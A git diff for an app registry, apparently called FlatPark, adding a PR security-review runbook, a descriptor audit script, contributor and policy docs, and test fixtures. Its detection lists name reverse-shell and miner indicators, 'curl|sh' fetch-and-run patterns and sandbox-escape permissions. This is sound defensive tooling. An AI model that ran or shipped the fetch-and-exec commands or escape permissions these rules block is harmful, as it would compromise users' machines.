+| 3 | Guardrail code (land this round) | `scripts/` + `.github/workflows/pr-checks.yml` | CI — deterministic auto-gate |
+
+`docs/pr-review.md` is the single source of truth; 2a and 2b are
+audience-tuned summaries that link back to it. The site already ships
+user-facing trust pages (`policies.md`, `trust.md`), so the rules live there
+rather than in a new page — making the review bar publicly visible is itself a
+trust signal.
+
+## 3. Provenance-based trust model (the core idea)
+
+License is **not** the trust axis — it is compliance metadata only. Non-FOSS is
+allowed; the registry already ships proprietary broker software
+(`com.schwab.thinkorswim`, `com.interactivebrokers.ibkrdesktop`). And open-source
+apps are not necessarily source-built: `org.electerm.Electerm` is
+`proprietary: false` yet FlatPark ships its **official prebuilt** GitHub-release
+tarball as extra-data.
+
+What matters is **where the bytes you run come from**. Every submission is placed
+in one of three provenance tiers:
+
+- **Tier 1 — source-built / reproducible / source-verifiable.** The shipped
+  interpreted code is byte-for-byte identical to the public source, or the build
+  is reproducible from the manifest. (Verify by diffing shipped `.py`/`.js`/`.sh`
+  against the public repo, or comparing code sections / build-id against a
+  canonical artifact, as was done for the bundled `node` in the PR #13 review.)
+
+- **Tier 2 — official upstream prebuilt (the dominant FlatPark case).** The app
+  is the vendor's or genuine project's **own** release, repackaged unmodified.
+  Trust requires all of:
+  1. **Official download source** — every `extra-data`/`archive` URL resolves to
+     the vendor's official domain or the genuine upstream repo (e.g.
+     `tosmediaserver.schwab.com`, `download2.interactivebrokers.com`,
+     `cdn.azul.com`, `github.com/electerm/electerm/releases/...`). **Not** the
+     submitter's personal account, **not** a third-party mirror.
+  2. **Unmodified repackage** — `build-commands` only `install` the FlatPark
+     wrapper/desktop/metainfo/icon and an `apply_extra` that unpacks the official
+     download. The manifest must **not** patch, `sed`, recompile, or otherwise
+     alter the vendor payload, and must not change the official package's runtime
+     behavior. The shipped artifact must equal what the official URL serves
+     (re-download and hash-compare).
+  3. **Pinned bytes** — the source is pinned (sha256 + size for extra-data) so a
+     build cannot silently swap the binary.
+
+- **Tier 3 — opaque third-party or submitter-built binary.** A prebuilt that is
+  neither source-verifiable nor a pinned official-upstream release — e.g. a
+  binary the submitter built on their own machine and hosts on their own account
+  (PR #13). **Auto-reject.**
+
+The "official URL + unmodified + pinned" rule (Tier 2) applies to **all** official
+prebuilts, FOSS or proprietary alike. License feeds Phase 6 (compliance) only.
+
+Why PR #13 fails: its download URL was the submitter's own personal release (not
+official), and the binary was re-built on the submitter's machine
+(`bundle-binaries.sh`) — Tier 3 — on top of the compliance (piracy) failure.
+
+## 4. The runbook — ordered phases
+
+Each review executes these in sequence and records results in the template
+(section 7).
+
+### Phase 0 — Rules of engagement (safety)
+- **Never execute untrusted code.** No running `install.sh`, manifest
+  `build-commands`, the app itself, `npm`/`pip`, or any shipped binary/script /
+  installer. Static analysis only.
+- Download artifacts as **bytes** into an isolated temp dir. **Inspect before
+  extract** (path-traversal / symlink / setuid check), then extract with
+  `--no-same-owner --no-same-permissions`. Run nothing inside.
+- Use read-only `gh` / API calls. Never paste secrets.
+- If a decision genuinely requires execution to resolve, **escalate to a human**
+  — do not execute.
+
+### Phase 1 — Scope & classification
+- Classify what the PR touches: new app (`registry/<id>/`), change to an existing
+  app, or **infrastructure**.
+- **High-scrutiny surface (STOP if a non-owner touches it):** `.github/`,
+  `scripts/`, signing config, **and** `registry/*/resolve-update.sh` plus
+  `flatpark.yml`'s `update.command` — these are CI-executed on a repo-write
+  token (`update-check.yml` runs with `contents: write` + `pull-requests: write`
+  and `check-updates.sh` `eval`s `update.command`).
+- Identify the changed app id(s).
+
+### Phase 2 — Submitter & provenance
+- Account age, history, social graph, other repos, prior contributions.
+- Source-repo age, corroboration, commit history and author identity (e.g. the
+  malformed `...@gmail.com@gmail.com` in PR #13).
+- **Timeline plausibility** — account → repo → release all created within hours
+  is a red flag.
+- Emit a trust tier: *established* / *unknown-but-plausible* / *throwaway-suspicious*.
+
+### Phase 3 — Descriptor & manifest static review
+- **Source pinning, per type:**
+  - `git` → require immutable `commit` (reject branch-only or tag-only).
+  - `archive` → require `sha256`; URL must resolve to genuine upstream.
+  - `extra-data` → require `sha256` and non-zero `size`.
+  - `file` → local packaging file; no remote pin, but reviewed as part of the PR.
+  - other / unknown types → NEEDS-HUMAN.
+- `finish-args` **risk scan**: near-auto-reject on escape perms
+  (`--talk-name=org.freedesktop.Flatpak`, `--filesystem=host`, `--filesystem=/`);
+  warn on `--device=all`, `--filesystem=home`, needless `--share=network`.
+- Read the descriptor `policy:` block and **cross-check against reality**: is
+  `proprietary` accurate; does `dangerous_permissions` cover the high-risk
+  finish-args actually used? (Hard enforcement deferred — see G2(b)/§9.)
+- Read **every build-command**: flag network fetch, `curl|bash`, writes outside
+  the build dir, and **any modification of the vendor payload or its runtime
+  behavior** (Tier-2 requirement 2).
+- Source URLs resolve to the **genuine upstream** (no lookalike domains, no
+  attacker fork masquerading as upstream).
+- `app-id` reverse-DNS vs the real vendor (impersonation / typosquat).
+- **`update.command`** must be a simple relative script path (e.g.
+  `./resolve-update.sh`); anything else → fail/NEEDS-HUMAN.
+- **[Tier 2]** download host = official vendor domain / genuine upstream, **not**
+  the submitter's personal namespace.
+
+### Phase 4 — Runtime-behavior scan
+- Grep manifest + shipped scripts + source for runtime fetch-and-exec
+  (`npm install`, `pip install`, `curl|wget`, `nc`, download-then-run).
+- **Vendor self-updater / runtime-download exception (allowed):** a vendor's own
+  installer/updater that downloads into the app's data/cache directory is
+  acceptable **when** all hold: it is the official vendor mechanism; FlatPark's
+  packaging does **not** patch or alter the official package's behavior; writes
+  stay inside the per-app data/cache dir (no host-home); endpoints are the
+  vendor's own and documented; no shell pipeline from an arbitrary URL. This is
+  how the existing brokers work (install4j self-updates jars in the app dir) and
+  is **not** a rejection.
+- **Still rejected:** runtime fetch-and-exec of **arbitrary third-party / unpinned
+  code** as a core mechanism (PR #13's `npm install peerflix`), or any updater
+  whose packaging patches the official behavior.
+- Review `update.command` / resolve scripts **as code** — they run on FlatPark's
+  CI infrastructure with a repo-write token.
+- Note the network endpoints the app talks to and any broad
+  filesystem × network combination.
+
+### Phase 5 — Artifact / binary provenance (the PR #13 deep-dive, generalized)
+- sha256 of the downloaded artifact == the manifest pin.
+- **Inspect without execution, per artifact type:**
+  - `tar` / `tar.gz` / `tgz` / `tar.zst` → list entries; reject path traversal,
+    symlink escape, setuid/setgid.
+  - `zip` → list with zip tooling; same traversal/symlink/setuid checks.
+  - `deb` / `rpm` → inspect the package payload **without running maintainer
+    scripts**; review those scripts statically.
+  - shell installer (`.sh`) → static review where practical; otherwise classify
+    as an opaque official prebuilt and require stronger Tier-2 provenance + human
+    judgment (do not execute it).
+  - **AppImage → not accepted** (rejected artifact type).
+- **[Tier 1]** shipped interpreted code == public source (byte-diff each file).
+- **[Tier 2]** shipped artifact == the official download (re-fetch the official
+  URL and hash-compare); confirm build-commands did not alter the payload.
+- Any "official" prebuilt (node, electron, a JRE, …) hash-verified against the
+  real upstream artifact (compare code sections / build-id where a canonical
+  artifact exists, as done for `node`). From-source builds with no reproducible
+  build resolve to NEEDS-HUMAN, not PASS.
+- IOC scan: persistence (autostart/cron/systemd/`.bashrc`), miners
+  (`xmrig`/`stratum+`), reverse shells (`/dev/tcp`, `nc -e`), hardcoded IPs,
+  embedded second ELF, RPATH/RUNPATH injection.
+
+### Phase 6 — Compliance & purpose
+- Non-FOSS / proprietary is **allowed** — not a rejection reason.
+- Reject only for **purpose/legality**: piracy, malware or abuse tooling,
+  trademark-infringing impersonation, content that is illegal to distribute.
+
+### Phase 7 — Verdict & report
+- Decision per the rubric (section 5). Produce a structured report and draft a PR
+  comment.
+- **The reviewer never merges or publishes — it recommends only. A human merges.**
+
+## 5. Decision rubric
+
+- **AUTO-REJECT (any one):**
+  - Compliance / legality violation (piracy, malware, trademark, illegal-to-distribute).
+  - Sandbox-escape permission (`--talk-name=org.freedesktop.Flatpak`, `--filesystem=host`/`/`).
+  - Unpinned / mutable source for its type (git without commit; archive/extra-data
+    without sha256; extra-data `size: 0`).
+  - **Tier 3** provenance: opaque third-party / submitter-built binary.
+  - **[Tier 1]** shipped code ≠ public source.
+  - **[Tier 2]** download source not official, OR packaging modifies the payload /
+    official behavior, OR shipped artifact ≠ official download.
+  - AppImage artifact.
+  - Runtime fetch-and-exec of arbitrary third-party / unpinned code as a core
+    mechanism (vendor self-updater exception in §4 does not count).
+  - `update.command` that is not a simple relative script path.
+  - IOC found (traversal / setuid / persistence / miner / reverse-shell /
+    embedded payload / RPATH injection).
+  - Infra/workflow/resolver tampering from an external contributor.
+  - Throwaway account **+** Tier-3 binary (the PR #13 combination).
+- **NEEDS-HUMAN:** from-source binaries not byte-verifiable · novel permission
+  needing justification · borderline provenance · unknown source type · shell
+  installer that can't be statically reviewed.
+- **PASS:** clean + trusted + provenance verified for its tier.
+
+## 6. Threat catalog → phase coverage
+
+| Attack class | Caught in |
+|---|---|
+| Opaque/submitter-built binary, Tier 3 (PR #13) | P5 |
+| Shipped code ≠ public source (Tier 1) | P5 |
+| Upstream prebuilt swapped / trojaned | P5 |
+| App-id / brand impersonation (typosquat) | P3 |
+| Malicious build-commands (CI RCE) | P3 |
+| Unpinned / mutable sources (post-review swap) | P3 + G1 |
+| Sandbox over-permission / escape | P3 + G2(a) |
+| Runtime fetch-and-exec of arbitrary code | P4 + G3 |
+| Update-channel hijack (`resolve-update.sh` / `update.command` on CI) | P1 + P4 + G4 |
+| Metainfo / metadata injection & phishing links | P3 (+ existing link check) |
+| CI / workflow / resolver tampering, secret exfiltration | P1 + G4 |
+| Throwaway account / social engineering | P2 |
+| Hijacked upstream / compromised maintainer | P2 (re-verify on update) |
+| Compliance / legal (piracy, trademark) | P6 |
+| Spyware / exfiltration / telemetry | P4 / P5 |
+| Cryptominer / resource abuse | P5 |
+| Dependency-confusion / lookalike source URL | P3 |
+| Steganographic / second-stage payload | P5 (+ stated limits) |
+| Non-official download source for a prebuilt | P3 + P5 |
+| Packaging modifies vendor payload / behavior | P3 + P5 |
+| Disallowed artifact type (AppImage) | P5 + G(backlog) |
+
+## 7. Review template table
+
+Copied into each review and filled in line by line.
+
+Legend: ✅ pass · ❌ fail (hard-reject) · ⚠️ warn (needs justification) ·
+👤 needs-human · ➖ N/A. Tier: 1 = source-verifiable · 2 = official prebuilt ·
+★ = all.
+
+| # | Phase | Check | Tier | Verdict | Evidence (cmd output / `file:line` / hash / url) |
+|---|---|---|---|---|---|
+| 0 | Safety | Static-only; nothing executed; artifacts handled in an isolated dir | ★ | | |
+| 1.1 | Scope | Classified: new app / app change / infra | ★ | | |
+| 1.2 | Scope | Touches high-scrutiny surface (`.github/`·`scripts/`·signing·`resolve-update.sh`·`update.command`)? non-owner → STOP | ★ | | |
+| 2.1 | Provenance | Submitter account age / history / graph / other repos | ★ | | |
+| 2.2 | Provenance | Source repo age, corroboration | ★ | | |
+| 2.3 | Provenance | Commit identity sane (no malformed email) | ★ | | |
+| 2.4 | Provenance | Timeline plausible (not account→repo→release within hours) | ★ | | |
+| 2.5 | Provenance | Trust tier: established / unknown-plausible / throwaway-suspicious | ★ | | |
+| 2.6 | Provenance | Artifact provenance tier assigned: 1 source-verifiable / 2 official prebuilt / 3 opaque (→reject) | ★ | | |
+| 3.1 | Manifest | Sources pinned per type (git→commit; archive/extra-data→sha256; extra-data size≠0; file→local) | ★ | | |
+| 3.2 | Manifest | finish-args has no escape perms; broad perms justified | ★ | | |
+| 3.3 | Manifest | `policy:` block honest: `proprietary` accurate, `dangerous_permissions` vs actual (warn until schema) | ★ | | |
+| 3.4 | Manifest | build-commands install-only; no patch/alter of vendor payload or behavior | ★ | | |
+| 3.5 | Manifest | source URLs = genuine upstream (no lookalike / fork) | ★ | | |
+| 3.6 | Manifest | `app-id` reverse-DNS matches real vendor (no impersonation) | ★ | | |
+| 3.7 | Manifest | `update.command` is a simple relative script path | ★ | | |
+| 3.8 | Manifest | download host = official vendor domain / upstream, not submitter account | 2 | | |
+| 4.1 | Runtime | No runtime fetch-and-exec of arbitrary/unpinned code (vendor self-updater to data dir, behavior unpatched = OK) | ★ | | |
+| 4.2 | Runtime | `update.command` / resolve script reviewed as code (runs on CI, repo-write) | ★ | | |
+| 4.3 | Runtime | Network endpoints noted; no broad filesystem×network combo | ★ | | |
+| 5.1 | Artifact | extra-data sha256 == manifest pin | ★ | | |
+| 5.2 | Artifact | Inspected per type (tar/zip/tgz/deb/rpm listed clean; AppImage rejected; .sh static-or-opaque); no traversal/symlink/setuid | ★ | | |
+| 5.3 | Artifact | shipped interpreted code == public source (byte diff) | 1 | | |
+| 5.4 | Artifact | shipped artifact == official download (re-fetch & hash); build did not alter payload | 2 | | |
+| 5.5 | Artifact | "official" prebuilts hash-verified vs upstream (from-source w/o reproducible → NEEDS-HUMAN) | ★ | | |
+| 5.6 | Artifact | IOC scan clean (persistence/miner/reverse-shell/hardcoded-IP/embedded-ELF/RPATH) | ★ | | |
+| 6.1 | Compliance | Purpose legal & policy-compliant (not piracy/malware/trademark/illegal-to-distribute) | ★ | | |
+| 6.2 | Compliance | Non-FOSS is NOT a rejection reason | ★ | | |
+| 7.1 | Verdict | Overall: AUTO-REJECT / NEEDS-HUMAN / PASS | ★ | | |
+| 7.2 | Verdict | Hard-fail triggers hit (list) | ★ | | |
+| 7.3 | Verdict | PR comment drafted; reviewer recommends only, human merges | ★ | | |
+
+Every ❌ must carry verifiable evidence (command output / `file:line` / hash /
+url). The verdict follows mechanically from "any hard-fail row hit".
+
+## 8. Public review-bar + contributing note (artifacts 2a, 2b)
+
+Both are audience-tuned summaries of the runbook; `docs/pr-review.md` stays the
+single source of truth that both link to.
+
+**2a — Public review-bar (`policies.md`, user-facing).** Expand the existing
+"Review" section into a concrete, plain-language statement of the bar, and align
+"What we host" with the provenance model:
+- FlatPark either verifies source-built packages where possible, or repackages
+  **official upstream prebuilts unmodified** — "the bytes you run are the
+  vendor's own".
+- Official prebuilts must come from the real upstream/vendor release channel;
+  unofficial or modified binaries are rejected.
+- Non-FOSS is allowed; openness is not the bar.
+- Every download is pinned by checksum; sandbox-escape permissions are rejected.
+- **Remove AppImage** from the accepted-download list ("an installer, AppImage,
+  `.deb`, `.rpm`, or tarball" → drop AppImage).
+- Do **not** imply every open-source prebuilt is byte-for-byte source-verified
+  unless FlatPark actually performs that verification.
+- Link to `docs/pr-review.md`; cross-link `trust.md` if it reads naturally.
+
+**2b — Contributor note (`contributing.md`, agent-facing).** Append a short
+"What we review (and what gets a PR rejected)" pre-flight checklist: pin every
+source per type; use official download URLs; do not modify the vendor payload or
+behavior; `update.command` is a plain `./resolve-update.sh`; declare
+`policy.proprietary` and `policy.dangerous_permissions`; no runtime fetch-and-exec
+of arbitrary code (vendor self-updaters to the data dir are fine); no
+sandbox-escape permissions; no AppImage; legitimate purpose.
+
+## 9. Guardrails to land this round (artifact 3)
+
+Deterministic, CI-enforced, hooked into the existing per-descriptor validation
+seam (`scripts/read-descriptor.mjs`, run for every descriptor in pr-checks.yml)
+and the fork-safe PR gate.
+
+- **G1 — source-pinning check (hard), per source type.** Fail a descriptor whose
+  referenced manifest has an unpinned source: `git` without `commit`; `archive`
+  or `extra-data` without `sha256`; `extra-data` with `size: 0`. `type: file`
+  needs no remote pin (do not flag the 30 existing file sources). Implement in a
+  new `scripts/audit-descriptor.mjs` (or extend `read-descriptor.mjs`).
+- **G2 — finish-args linter.**
+  - **(a) escape-perm hard-fail (ship now, trips no existing app):**
+    `--talk-name=org.freedesktop.Flatpak`, `--filesystem=host`, `--filesystem=/`.
+  - **(b) declaration-consistency (warn-only this round):** a dangerous finish-arg
+    not declared in `policy.dangerous_permissions`. Stays warning until a
+    machine-readable `dangerous_permissions` schema is defined and existing
+    descriptors are migrated (all currently declare `[]`).
+- **G3 — runtime-fetch grep (warn-only this round).** Grep manifest
+  build-commands and shipped scripts for `npm install` / `pip install` /
+  `curl … | sh` / `wget … | sh`; warn for human review (vendor self-updaters are
+  expected to surface here — hence warn, not fail).
+- **G4 — infra/resolver-change tripwire (author-gated).** In `pr-checks.yml`, a
+  PR that modifies `.github/`, `scripts/`, signing config,
+  `registry/*/resolve-update.sh`, or a `flatpark.yml` `update.command` is flagged.
+  The threat is an *external* contributor sneaking such a change in, so it
+  **hard-fails only for untrusted authors**; for a trusted author
+  (`author_association` OWNER / MEMBER / COLLABORATOR) it emits a notice and
+  passes, so the maintainer's own infra PRs aren't blocked and the job is safe to
+  mark as a required check. `update.command` is also enforced to be a simple
+  relative path (in `audit-descriptor.mjs`, for every author).
+
+**Backlog (not this round):** `dangerous_permissions` schema + registry
+migration (unblocks G2(b) → hard); reproducible-build verification; automated
+official-source / host-ownership check for prebuilts (3.8); AppImage-reject
+descriptor check; XXE-safe metainfo validation; `eval` removal in
+`check-updates.sh`.
+
+## 10. Integration & process
+
+- The runbook is invoked manually by the maintainer's agent ("review PR #N") and
+  followed top-to-bottom; the filled template + drafted comment is the output.
+- Guardrails run automatically in `pr-checks.yml` on every PR (fork-safe: no
+  secrets), failing the gate on hard violations before a human looks.
+- The reviewer role recommends only; merge/publish stays a human action on push
+  to main (existing signing/publish flow is unchanged).
+
+## 11. Out of scope
+
+- No change to the signing/publish pipeline or its security boundary.
+- No automated official-domain ownership oracle this round (human/agent judges in
+  the runbook; automation is backlog).
+- `dangerous_permissions` hard-enforcement, reproducible-build verification, and
+  `eval` removal in `check-updates.sh` are backlog, not this round.
+- From-source-built binaries lacking a reproducible build resolve to NEEDS-HUMAN,
+  not PASS.

--- a/scripts/audit-descriptor.mjs
+++ b/scripts/audit-descriptor.mjs
@@ -1,0 +1,199 @@
+#!/usr/bin/env node
+// Audit a FlatPark registry descriptor + its manifest against the review-bar
+// guardrails (see docs/pr-review.md). Dependency-free: the PR gate runs `node`
+// before any `npm ci`, so this uses the same manual line-scan style as
+// read-descriptor.mjs rather than a YAML library.
+//
+//   node scripts/audit-descriptor.mjs <flatpark.yml>
+//
+// Exit 0 = no hard failures (warnings allowed); exit 1 = hard failure(s).
+// Hard failures print `FAIL: ...`; advisory findings print `WARN: ...`.
+import { readFileSync, readdirSync } from 'node:fs';
+import { dirname, join } from 'node:path';
+
+const file = process.argv[2];
+if (!file) {
+  process.stderr.write('usage: audit-descriptor.mjs <flatpark.yml>\n');
+  process.exit(2);
+}
+
+const fails = [];
+const warns = [];
+const fail = (m) => fails.push(m);
+const warn = (m) => warns.push(m);
+
+const readText = (p) => readFileSync(p, 'utf8').replace(/\r/g, '');
+const indentOf = (l) => l.length - l.replace(/^\s+/, '').length;
+function unquote(v) {
+  v = v.trim();
+  if (v === '' || v === '~' || v === 'null') return '';
+  const c = v[0];
+  if ((c === '"' || c === "'") && v[v.length - 1] === c) return v.slice(1, -1);
+  return v;
+}
+
+// --- descriptor: build.manifest, update.command, policy.{proprietary,dangerous_permissions}
+let descText;
+try {
+  descText = readText(file);
+} catch (e) {
+  process.stderr.write(`FAIL: cannot read ${file}: ${e.message || e}\n`);
+  process.exit(1);
+}
+
+let manifestName = '';
+let updateCommand = '';
+let proprietary = null;
+const dangerousPerms = [];
+{
+  let section = null;
+  let inDanger = false;
+  for (const raw of descText.split('\n')) {
+    if (!raw.trim() || /^\s*#/.test(raw)) continue;
+    const ind = indentOf(raw);
+    const s = raw.trim();
+    if (ind === 0) {
+      inDanger = false;
+      const m = s.match(/^([A-Za-z0-9_]+):\s*(.*)$/);
+      section = m && m[2] === '' ? m[1] : null;
+      continue;
+    }
+    if (s.startsWith('- ')) {
+      if (section === 'policy' && inDanger) dangerousPerms.push(unquote(s.slice(2)));
+      continue;
+    }
+    const m = s.match(/^([A-Za-z0-9_]+):\s*(.*)$/);
+    if (!m) continue;
+    const [, k, v] = m;
+    if (section === 'build' && k === 'manifest') manifestName = unquote(v);
+    else if (section === 'update' && k === 'command') updateCommand = unquote(v);
+    else if (section === 'policy') {
+      if (k === 'proprietary') proprietary = unquote(v) === 'true';
+      else if (k === 'dangerous_permissions') {
+        const t = v.trim();
+        if (t === '') inDanger = true;
+        else if (t !== '[]') t.replace(/^\[|\]$/g, '').split(',').map(unquote).filter(Boolean).forEach((x) => dangerousPerms.push(x));
+      }
+    }
+  }
+}
+
+if (!manifestName) fail('descriptor missing build.manifest');
+
+// update.command must be a simple relative script path (it runs in CI).
+if (updateCommand && !/^\.\/[A-Za-z0-9._-]+$/.test(updateCommand)) {
+  fail(`update.command must be a simple relative script path (e.g. ./resolve-update.sh), got: ${updateCommand}`);
+}
+
+// --- manifest: finish-args, sources, build-commands
+const dir = dirname(file);
+const finishArgs = [];
+const sources = []; // [{ type, keys }]
+const buildCommands = [];
+if (manifestName) {
+  let manifestText = '';
+  try {
+    manifestText = readText(join(dir, manifestName));
+  } catch {
+    fail(`cannot read manifest ${manifestName}`);
+  }
+  if (manifestText) {
+    let block = null; // 'finish' | 'build' | 'sources'
+    let blockIndent = -1;
+    let cur = null; // current source
+    let curIndent = -1;
+    let srcItemIndent = -1; // indent of a `- ` source item within the current sources block
+    for (const raw of manifestText.split('\n')) {
+      if (!raw.trim() || /^\s*#/.test(raw)) continue;
+      const ind = indentOf(raw);
+      const s = raw.trim();
+
+      if (block !== null && ind <= blockIndent) { block = null; cur = null; srcItemIndent = -1; }
+
+      const hdr = s.match(/^(finish-args|build-commands|sources):\s*(.*)$/);
+      if (hdr && (hdr[2].trim() === '' || hdr[2].trim() === '[]')) {
+        block = hdr[1] === 'finish-args' ? 'finish' : hdr[1] === 'build-commands' ? 'build' : 'sources';
+        blockIndent = ind;
+        cur = null;
+        srcItemIndent = -1;
+        continue;
+      }
+
+      if (block === 'finish' && s.startsWith('- ')) { finishArgs.push(unquote(s.slice(2))); continue; }
+      if (block === 'build' && s.startsWith('- ')) { buildCommands.push(unquote(s.slice(2))); continue; }
+      if (block === 'sources') {
+        if (s.startsWith('- ')) {
+          if (srcItemIndent === -1) srcItemIndent = ind;
+          // Only a `- ` at the source-item indent starts a new source; a deeper
+          // `- ` is a nested list value (e.g. a mirror-urls entry).
+          if (ind === srcItemIndent) {
+            cur = { type: '', keys: {} };
+            curIndent = ind;
+            sources.push(cur);
+            const li = s.slice(2).match(/^([A-Za-z0-9_-]+):\s*(.*)$/);
+            if (li) {
+              cur.keys[li[1]] = unquote(li[2]);
+              if (li[1] === 'type') cur.type = unquote(li[2]);
+            }
+          }
+          continue;
+        }
+        if (cur && ind > curIndent) {
+          const kv = s.match(/^([A-Za-z0-9_-]+):\s*(.*)$/);
+          if (kv) {
+            cur.keys[kv[1]] = unquote(kv[2]);
+            if (kv[1] === 'type') cur.type = unquote(kv[2]);
+          }
+          continue;
+        }
+      }
+    }
+  }
+}
+
+// G1 — source pinning, per type.
+const LOCAL = new Set(['file', 'script', 'patch', 'dir', 'shell']);
+for (const src of sources) {
+  const t = src.type;
+  if (t === 'git') {
+    if (!src.keys.commit) fail(`git source missing immutable commit (${src.keys.url || ''})`);
+  } else if (t === 'archive') {
+    if (!src.keys.sha256) fail(`archive source missing sha256 (${src.keys.url || ''})`);
+  } else if (t === 'extra-data') {
+    if (!src.keys.sha256) fail(`extra-data source missing sha256 (${src.keys.url || src.keys.filename || ''})`);
+    if (!src.keys.size || src.keys.size === '0') fail(`extra-data source missing/zero size (${src.keys.url || src.keys.filename || ''})`);
+  } else if (t === '' || !LOCAL.has(t)) {
+    warn(`source type '${t || '?'}' not auto-verified — needs human review`);
+  }
+}
+
+// G2(a) — sandbox-escape permissions are a hard fail.
+const ESCAPE = ['--talk-name=org.freedesktop.Flatpak', '--filesystem=host', '--filesystem=/'];
+// G2(b) — broad perms must be declared in policy.dangerous_permissions (warn until schema lands).
+const WATCH = ['--device=all', '--filesystem=home'];
+for (const fa of finishArgs) {
+  if (ESCAPE.includes(fa)) fail(`sandbox-escape permission: ${fa}`);
+  if (WATCH.includes(fa) && !dangerousPerms.includes(fa)) {
+    warn(`dangerous permission ${fa} not declared in policy.dangerous_permissions`);
+  }
+}
+
+// G3 — runtime fetch-and-exec (warn only; vendor self-updaters surface here too).
+const FETCH = [/\bnpm install\b/, /\bpip install\b/, /\bpip3 install\b/, /curl[^\n]*\|\s*sh\b/, /wget[^\n]*\|\s*sh\b/];
+const scan = [...buildCommands];
+try {
+  for (const f of readdirSync(dir)) {
+    if (/\.sh$/.test(f) || /wrapper$/.test(f)) {
+      try { scan.push(readText(join(dir, f))); } catch { /* ignore */ }
+    }
+  }
+} catch { /* ignore */ }
+for (const text of scan) {
+  for (const re of FETCH) {
+    if (re.test(text)) { warn(`possible runtime fetch-and-exec: ${text.trim().split('\n')[0].slice(0, 80)}`); break; }
+  }
+}
+
+for (const w of warns) process.stderr.write(`WARN: ${w}\n`);
+for (const f of fails) process.stderr.write(`FAIL: ${f}\n`);
+process.exit(fails.length ? 1 : 0);

--- a/site/src/content/pages/contributing.md
+++ b/site/src/content/pages/contributing.md
@@ -135,10 +135,10 @@ repo="owner/name"
 rel="$(curl -fsSL ${GITHUB_TOKEN:+-H "Authorization: Bearer $GITHUB_TOKEN"} \
         "https://api.github.com/repos/$repo/releases/latest")"
 version="$(jq -r '.tag_name | ltrimstr("v")' <<<"$rel")"
-url="$(jq -r '.assets[]|select(.name|test("x86_64.*\\.AppImage$")).browser_download_url' <<<"$rel")"
+url="$(jq -r '.assets[]|select(.name|test("linux.*x86_64.*\\.tar\\.gz$")).browser_download_url' <<<"$rel")"
 date="$(jq -r '.published_at' <<<"$rel" | cut -c1-10)"
 jq -n --arg v "$version" --arg d "$date" --arg u "$url" \
-  '{version:$v,releaseDate:$d,sources:[{filename:"app.AppImage",url:$u}]}'
+  '{version:$v,releaseDate:$d,sources:[{filename:"app.tar.gz",url:$u}]}'
 ```
 
 A vendor JSON endpoint (version in one field, URL in another):
@@ -169,3 +169,34 @@ jq -n --arg v "$version" \
 Prefer the tightest `finish-args` that still work. Avoid `--filesystem=home` and
 other broad grants; FlatPark surfaces permissions on each app's detail page, and
 broad grants will be questioned in review.
+
+## What we review (and what gets a PR rejected)
+
+Every PR is checked against the full
+[review runbook](https://github.com/jing2uo/flatpark/blob/main/docs/pr-review.md).
+To pre-empt the common rejections, make sure your submission:
+
+- **Pins every remote source** — `extra-data`/`archive` need `sha256` (and
+  `extra-data` a non-zero `size`); `git` needs an immutable `commit`. (`type:
+  file` packaging files need no pin.)
+- **Downloads only from the official channel** — the vendor's own domain or the
+  genuine upstream repo, never a personal account or a mirror.
+- **Repackages the official build unmodified** — `build-commands` only install
+  the wrapper/desktop/metainfo/icon and an `apply_extra` that unpacks the
+  download; don't patch, recompile, or change the app's behavior.
+- **Uses a plain resolver** — `update.command` is a simple relative script path
+  like `./resolve-update.sh` (it runs in CI).
+- **Declares its `policy`** — set `proprietary` honestly and list any high-risk
+  permissions in `dangerous_permissions`.
+- **Doesn't fetch-and-run arbitrary code** — a vendor's own self-updater writing
+  into the app's data directory is fine; downloading and executing unpinned
+  third-party code is not.
+- **Avoids sandbox-escape permissions** — no `--filesystem=host`,
+  `--filesystem=/`, or `--talk-name=org.freedesktop.Flatpak`.
+- **Ships an accepted artifact** — tarball, `.deb`, `.rpm`, zip, or an official
+  installer. **AppImage is not accepted.**
+- **Has a legitimate purpose** — non-FOSS is fine; piracy, malware, and trademark
+  impersonation are not.
+
+Non-FOSS commercial apps (e.g. brokers) are welcome on the same bar: official
+source, unmodified, pinned.

--- a/site/src/content/pages/policies.md
+++ b/site/src/content/pages/policies.md
@@ -12,9 +12,9 @@ listed.
 ## What we host
 
 Any app with an official, prebuilt download at a stable public URL — an
-installer, AppImage, `.deb`, `.rpm`, or tarball. FlatPark fetches it at build,
-pins it by checksum, and signs the result. It never builds from source and never
-re-hosts the binary.
+installer, `.deb`, `.rpm`, or tarball. FlatPark fetches it at build, pins it by
+checksum, and signs the result. It never builds from source and never re-hosts
+the binary. (AppImage is not accepted.)
 
 ## Requirements
 
@@ -34,9 +34,26 @@ quality — not on how they were written.
 
 ## Review
 
-Every submission is reviewed (AI-assisted) weighing provenance, the requested
-permissions, and overall quality. The packaging is a small, auditable set of
-files per app, which keeps review tractable.
+Every submission is reviewed (AI-assisted) against a published
+[review runbook](https://github.com/jing2uo/flatpark/blob/main/docs/pr-review.md).
+The trust question is **where the bytes you run come from**, not the license:
+
+- FlatPark either verifies source-built packages against their public source, or
+  repackages an **official upstream prebuilt unmodified** — the bytes you run are
+  the vendor's own.
+- Official prebuilts must come from the real upstream/vendor release channel. A
+  binary hosted on a submitter's personal account or a mirror, or one rebuilt or
+  patched during packaging, is rejected.
+- Every download is pinned by `sha256` (and size), so a build cannot silently
+  swap it.
+- Sandbox-escape permissions (host filesystem, the Flatpak control bus) are
+  rejected; broad grants must be justified.
+- **Non-FOSS is allowed** — openness is not the bar. We reject on purpose, not
+  license: piracy, malware, trademark impersonation, or anything illegal to
+  distribute.
+
+We don't claim every open-source prebuilt is byte-for-byte source-verified — only
+that it is an official upstream build, pinned and unmodified.
 
 ## De-listing
 

--- a/tests/fixtures/audit/bad-escape/flatpark.yml
+++ b/tests/fixtures/audit/bad-escape/flatpark.yml
@@ -1,0 +1,10 @@
+id: com.example.App
+name: Example App
+summary: A test app
+build:
+  manifest: manifest.yml
+update:
+  command: ./resolve-update.sh
+policy:
+  proprietary: true
+  dangerous_permissions: []

--- a/tests/fixtures/audit/bad-escape/manifest.yml
+++ b/tests/fixtures/audit/bad-escape/manifest.yml
@@ -1,0 +1,13 @@
+app-id: com.example.App
+finish-args:
+  - --share=network
+  - --filesystem=host
+modules:
+  - name: example
+    buildsystem: simple
+    sources:
+      - type: extra-data
+        filename: app.tar.gz
+        url: https://example.com/app.tar.gz
+        sha256: 0000000000000000000000000000000000000000000000000000000000000000
+        size: 12345

--- a/tests/fixtures/audit/bad-unpinned/flatpark.yml
